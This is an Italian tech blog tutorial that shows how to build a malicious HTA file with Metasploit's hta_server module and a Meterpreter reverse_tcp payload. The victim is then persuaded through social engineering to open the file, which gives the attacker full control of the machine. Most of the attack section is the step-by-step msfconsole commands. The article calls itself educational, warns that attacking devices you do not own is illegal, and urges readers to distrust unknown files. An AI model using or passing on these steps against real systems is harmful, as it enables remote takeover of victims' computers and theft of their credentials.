
Non aprire questo file (esempio di attacco hacker)
Cari lettori di Tecnogalaxy, vi chiederete ancora un articolo con un titolo strano? Ebbene sì, oggi andremo a vedere una tecnica che se utilizzata da un malintenzionato potrebbe mettere a rischio la nostra sicurezza informatica, tutto questo solo aprendo un banalissimo file!!! Pazzesco se ci pensate.
Entriamo nella mente di un pirata informatico che deve rubare userID, password di accesso ai vari sistemi, file, per poi rivendere queste informazioni sul dark web…. come prima cosa studierà il campo di attacco e la strategia sia informatica che di ingegneria sociale da mettere in atto.
Ovviamente questo test è solo a scopo didattico, non mi assumo nessuna responsabilità di quello che farete, violare un sistema altrui senza permesso è perseguibile penalmente.
Come funziona l’attacco tramite file infetto
Partiamo subito con il nostro test sempre utilizzando il nostro caro amico Kali Linux, apriamo una shell e scriviamo il seguente comando:
ifconfig (per recuperare l’indirizzo ip)
msfconsole (eseguiamo msfconsole)
Adesso dobbiamo recuperare il modulo da utilizzare, scriviamo il comando:
use exploit/windows/misc/hta_server
set lhost "il nostro indirizzo ip"
set srvhost "il nostro indirizzo ip"
set payload windows/meterpreter/reverse_tcp
set lport 8111
Lanciamo l’exploit:
exploit
A questo punto il tool genera il file che il malintenzionato invierà alla vittima scaricandolo dal seguente link:
Adesso entra in campo la tecnica sull’ingegneria sociale, il successo dell’attacco dipenderà dalla bravura del malintenzionato ad indurre il malcapitato ad aprire il file appena generato.
Una volta aperto il file il sistema in ascolto aggancia il computer del malcapitato prendendone possesso dell’intero sistema.
Come abbiamo potuto vedere aprire un file senza essere consapevoli al 100% della sua provenienza potrebbe mettere a rischio il vostro sistema e tutta la rete aziendale.
Bisogna essere diffidenti sul web e verificare sempre nel dettaglio la provenienza di qualsiasi file, mail, link etc…
Come sempre fatene buon uso facendo dei test su vostri device / computer , farli su device/computer non vostri è illegale.
Al prossimo articolo.
N.B.: Non mi assumo nessuna responsabilità dell’uso che farete della guida, in quanto stilata per uso didattico e formativo.
Giorgio Perego
IT Manager
Leggi anche:
- Come Navigare Sicuri
- I vantaggi in termini di sicurezza derivanti dall’utilizzo delle VDR nelle transazioni immobiliari
- Cos’è il cashback: caratteristiche, utilità, settori
- Wire ha appena ricevuto un finanziamento di 30 milioni
- Woolsocks: Regali di Natale GRATIS
Ti è stato di aiuto questo articolo? Aiuta questo sito a mantenere le varie spese con una donazione a piacere cliccando su questo link. Grazie!
Seguici anche su Telegram cliccando su questo link per rimanere sempre aggiornato sugli ultimi articoli e le novità riguardanti il sito.
Se vuoi fare domande o parlare di tecnologia puoi entrare nel nostro gruppo Telegram cliccando su questo link.
© Tecnogalaxy.it - Vietato riprodurre il contenuto di questo articolo.
I PIÙ LETTI
ARTICOLI RECENTI